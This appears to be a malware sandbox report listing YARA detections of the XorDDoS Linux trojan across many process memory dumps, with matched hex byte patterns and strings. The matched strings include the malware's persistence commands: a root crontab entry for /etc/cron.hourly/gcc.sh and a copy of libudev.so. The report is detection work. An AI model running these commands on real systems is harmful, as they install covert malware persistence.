6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6319.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6362.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6243.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6343.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6301.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6359.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6346.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6377.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6414.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6354.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6316.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6409.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6400.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6251.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6251.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6251.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6251.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6251.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
